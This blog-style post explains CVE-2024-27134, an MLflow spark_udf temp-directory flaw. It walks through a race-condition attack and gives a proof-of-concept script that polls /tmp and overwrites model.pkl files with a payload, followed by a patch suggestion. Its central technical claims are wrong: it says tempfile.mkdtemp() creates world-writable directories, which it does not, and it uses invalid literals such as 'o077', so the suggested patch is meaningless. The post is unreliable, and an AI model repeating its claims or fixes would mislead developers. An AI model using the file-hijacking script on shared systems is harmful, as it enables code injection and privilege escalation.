CVE-2024-27134 - Exploiting Excessive Directory Permissions in MLflow for Local Privilege Escalation with spark

CVE-2024-27134 is a recently disclosed vulnerability found in MLflow, a popular open-source machine learning platform. The core of this issue revolves around excessive directory permissions in MLflow's handling of temporary files and directories created when you use the spark_udf() API. These improper permissions open the door to a local privilege escalation exploit, specifically via a Time-of-Check to Time-of-Use (ToCToU) attack.

If your machine learning team uses MLflow together with Apache Spark and leverages mlflow.pyfunc.spark_udf(), this vulnerability deserves immediate attention.

In this post, we’ll break down how the flaw works, show example code, and explain how an attacker can exploit it. As of this writing (June 2024), you should check your installed MLflow version and update/policy accordingly.

Why is this Dangerous?

When MLflow creates temporary directories for its Spark UDF (User Defined Function) support, it sets permissions that are too broad (e.g., world-writable). A local attacker could exploit this moment, swapping or manipulating critical files between the time MLflow checks those permissions and the time it actually uses those files—this is known as a ToCToU attack.

Result:
The attacker can escalate privileges within the local system—potentially running code as the user who started the MLflow process (which could be root or another privileged account running workloads).

Where is the Issue in the Code?

The vulnerability is in MLflow’s handling of temporary directories within its Python function (pyfunc) Spark UDF packaging process. Here’s a simplified code snippet highlighting the problem:

import mlflow.pyfunc
from pyspark.sql import SparkSession

# Sample user-defined function
def double(x):
    return x * 2

spark = SparkSession.builder.getOrCreate()

# This line triggers MLflow to create a temporary directory for the UDF
udf = mlflow.pyfunc.spark_udf(
    spark,
    model_uri="runs:/<my_run_id>/model",
    result_type="double",
)

# [Inside MLflow] (simplified, real code is inside mlflow/utils/file_utils.py)
import tempfile
import os

tmpdir = tempfile.mkdtemp()  # Created with default permissions (e.g., o777)
# MLflow writes files here, without checking for race conditions.

Problem:
The temporary directory is created with weak permissions (like o777). MLflow’s code doesn't guarantee atomicity or exclusivity over the directory’s contents.

Here’s a simple step-by-step exploit scenario

1. MLflow calls tempfile.mkdtemp() to create a temp directory for its Spark UDF packaging. This happens with default permissions, meaning anyone on the machine may write to it.
2. Local attacker monitors the system for such directory creation (e.g., via inotify or repeated checks in /tmp).
3. Attacker replaces key files or the directory itself in the window between MLflow’s directory creation and when those files are actually used (classic ToCToU).
4. Malicious code executes: When MLflow or Spark loads the UDF, it accidentally runs the attacker’s payload, which can escalate privileges (e.g., to the MLflow service user or even root).

Example Exploit Script (Proof of Concept)

Please do not use this for malicious purposes—for education only!

import os
import time

WATCH_DIR = '/tmp'

def search_and_replace():
    while True:
        for entry in os.listdir(WATCH_DIR):
            entry_path = os.path.join(WATCH_DIR, entry)
            if entry.startswith('tmp') and os.path.isdir(entry_path):
                # Overwrite a file MLflow will use
                target_file = os.path.join(entry_path, 'model.pkl')
                with open(target_file, 'w') as f:
                    f.write('evil-pickle-payload')
                print(f'Evil payload written to {target_file}')
                return
        time.sleep(.1)

search_and_replace()

If a user runs MLflow’s Spark UDF in parallel, this script could let you hijack the process.

Any use of mlflow.pyfunc.spark_udf().

- Especially dangerous if MLflow runs as a privileged user (root, or a ‘mlflow’ service account).

Upgrade MLflow:

Check the official MLflow GitHub Security Advisories or their release notes for patches or upgraded versions. Upgrades should patch the permissions used when creating temporary directories.

Harden File Permissions Manually:

Create a wrapper script or patch MLflow to set restrictive permissions (o700) when creating temp directories.

Sample patch

# Instead of:
tmpdir = tempfile.mkdtemp()
# Do:
old_umask = os.umask(o077)
try:
    tmpdir = tempfile.mkdtemp()
finally:
    os.umask(old_umask)

References

- Original GHSA: GHSA-5jvh-4w3p-h593
- CVE record: CVE-2024-27134 at cve.org
- MLflow Documentation: mlflow.pyfunc.spark_udf API
- tempdir security issue background: Python Security Issue 22107

Conclusion

CVE-2024-27134 is a reminder that even "local only" vulnerabilities can lead to significant privilege escalation in shared environments. If your ML workloads use MLflow with Spark, review your deployment for this specific risk, check permissions, and upgrade as soon as fixes are available.

Stay secure—always check the permissions your code grants others, even on local temp files!

Have more questions about MLflow or machine learning security? Drop a comment, and I’ll help you out!

Timeline

Published on: 11/25/2024 14:15:06 UTC